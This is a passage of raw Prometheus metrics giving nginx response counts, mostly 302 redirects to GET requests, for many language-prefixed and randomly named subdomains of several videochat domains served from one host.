nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.world"} 3064 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="dbkrftg.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.cafe"} 1221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.date"} 183 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.mx"} 1549 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.show"} 254 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.tv.br"} 954 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.world"} 2844 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="demo.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="dev.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="dkdhvjv.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="dniqnmt.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="dwpqqsi.videochat.mx"} 204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="dyjwolv.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eaqvugu.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="edbgopap.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.cafe"} 1997 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.date"} 2569 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.mx"} 1108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.show"} 249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.tv.br"} 2480 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.world"} 1238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.cafe"} 1031 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.date"} 284 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.mx"} 3496 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.show"} 171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.tv.br"} 2469 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.world"} 3100 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.cafe"} 1264 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.date"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.mx"} 2031 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.show"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.tv.br"} 1077 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ensgapap.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.cafe"} 1934 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.date"} 331 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.mx"} 2084 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.show"} 299 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.tv.br"} 1130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.world"} 3171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eojoxne.videochat.mx"} 312 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="epyqbar.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="erqlemr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.cafe"} 1610 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.date"} 2816 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.show"} 583 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.tv.br"} 1553 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.world"} 3194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="esifuyi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="esiityi.videochat.mx"} 119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.cafe"} 1379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.date"} 701 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.mx"} 1544 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.show"} 861 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.tv.br"} 1259 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.world"} 3947 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.cafe"} 905 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.date"} 1086 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.mx"} 1431 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.show"} 395 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.tv.br"} 818 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eu.videochat.world"} 3024 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.cafe"} 1142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.date"} 328 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.mx"} 4154 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.show"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.tv.br"} 3222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fa.videochat.world"} 4519 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fblhxlelxyfr.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fceameo.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fcflfis.videochat.mx"} 140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fcirqky.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.cafe"} 976 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.date"} 2441 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.mx"} 3825 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.show"} 1970 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.tv.br"} 2418 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fi.videochat.world"} 2729 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fjtlhmrj.videochat.mx"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="foxdqtl.videochat.mx"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fpaaipap.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fpobbvpmfscy.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.cafe"} 1045 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.date"} 263 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.mx"} 1764 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.show"} 346 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.tv.br"} 1119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fr.videochat.world"} 3498 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fskyuka.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="fxtrokm.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.cafe"} 1708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.date"} 736 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.mx"} 1518 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.show"} 835 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.tv.br"} 1840 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ga.videochat.world"} 4652 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ghnoupa.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="git.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.cafe"} 1603 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.date"} 289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.mx"} 1297 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.show"} 354 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.tv.br"} 2141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gl.videochat.world"} 3362 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gshflesiityi.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gsvyilo.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.cafe"} 850 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.date"} 397 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.mx"} 1645 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.show"} 196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.tv.br"} 1031 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gu.videochat.world"} 3435 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="gvwjvte.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="harvestreako.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.cafe"} 1228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.date"} 2797 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.mx"} 1484 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.show"} 527 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.tv.br"} 1112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="he.videochat.world"} 2937 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hfqbkbn.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hhbjxne.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.cafe"} 1002 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.date"} 2534 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.mx"} 1496 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.show"} 301 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.tv.br"} 1391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hi.videochat.world"} 3323 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hnipnxh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.cafe"} 860 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.date"} 2857 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.mx"} 1408 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.show"} 2771 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.tv.br"} 1131 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hr.videochat.world"} 3158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hrwqvkn.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.cafe"} 1479 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.date"} 488 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.mx"} 1647 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.show"} 886 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.tv.br"} 905 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ht.videochat.world"} 1526 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="httnl.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="httpbin.org"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="httpgl.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.cafe"} 3389 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.date"} 2297 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.mx"} 1367 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.show"} 223 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.tv.br"} 1052 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hu.videochat.world"} 3124 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="huvcgmi.videochat.mx"} 616 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="huyapaf.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="hxylzca.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="iamhcpap.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ibelgms.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ibwxcsw.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="iclgzbs.videochat.mx"} 486 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.cafe"} 905 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.date"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.mx"} 1218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.show"} 934 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.tv.br"} 761 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="id.videochat.world"} 4169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="iothddbkrftg.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.cafe"} 1576 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.date"} 394 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.mx"} 1518 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.show"} 411 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.tv.br"} 1512 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="is.videochat.world"} 3371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.cafe"} 906 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.date"} 2467 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.mx"} 1656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.show"} 288 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.tv.br"} 674 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="it.videochat.world"} 2279 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="iwciapa.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jaiyuba.videochat.mx"} 379 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jargoba.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jeeaasv.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jhazhhi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.cafe"} 1096 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.date"} 2737 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.mx"} 1266 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.show"} 279 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.tv.br"} 986 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jp.videochat.world"} 3024 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jpwioar.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jrtfyzrhffuzjrval.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="junkfuk.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.cafe"} 945 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.date"} 939 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.mx"} 1231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.show"} 631 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.tv.br"} 2681 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jv.videochat.world"} 940 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="jvlrmcs.videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.cafe"} 1375 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.date"} 189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.mx"} 1391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.show"} 260 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.tv.br"} 961 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ka.videochat.world"} 1720 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kbmjvka.videochat.mx"} 315 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kbpnhsi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kctjjudm.videochat.mx"} 421 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="keevjmr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kgyhobe.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kjjlaro.videochat.mx"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.cafe"} 1119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.date"} 320 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.mx"} 1501 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.show"} 265 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.tv.br"} 1069 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kk.videochat.world"} 4893 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.cafe"} 957 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.date"} 635 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.mx"} 1678 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.show"} 171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.tv.br"} 3241 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="km.videochat.world"} 4977 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.cafe"} 1142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.date"} 304 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.mx"} 1226 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.show"} 179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.tv.br"} 2791 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kn.videochat.world"} 3107 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.cafe"} 816 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.date"} 2643 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.mx"} 1850 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.show"} 218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.tv.br"} 764 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ko.videochat.world"} 3658 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kxhhvtl.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kxxgdaz.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="kxylkid.videochat.mx"} 354 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.cafe"} 1125 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.date"} 249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.mx"} 1442 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.show"} 853 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.tv.br"} 1328 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ky.videochat.world"} 3628 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.cafe"} 1282 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.date"} 516 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.mx"} 1440 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.show"} 366 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.tv.br"} 698 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lb.videochat.world"} 2848 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lbfxhvi.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lekker-lopeaf.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lelxyfr.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lemsnsi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lffdjlo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lggtovozstpt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lhuqozrhffuzjrval.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lilvami.videochat.mx"} 568 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="linderafashionstylgl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lkkkwfi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lkvmlal.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="llibgam.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.cafe"} 1343 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.date"} 464 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.mx"} 1689 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.show"} 657 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.tv.br"} 1990 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lo.videochat.world"} 3113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.cafe"} 967 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.date"} 2842 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.mx"} 1232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.show"} 161 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.tv.br"} 912 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="lt.videochat.world"} 3136 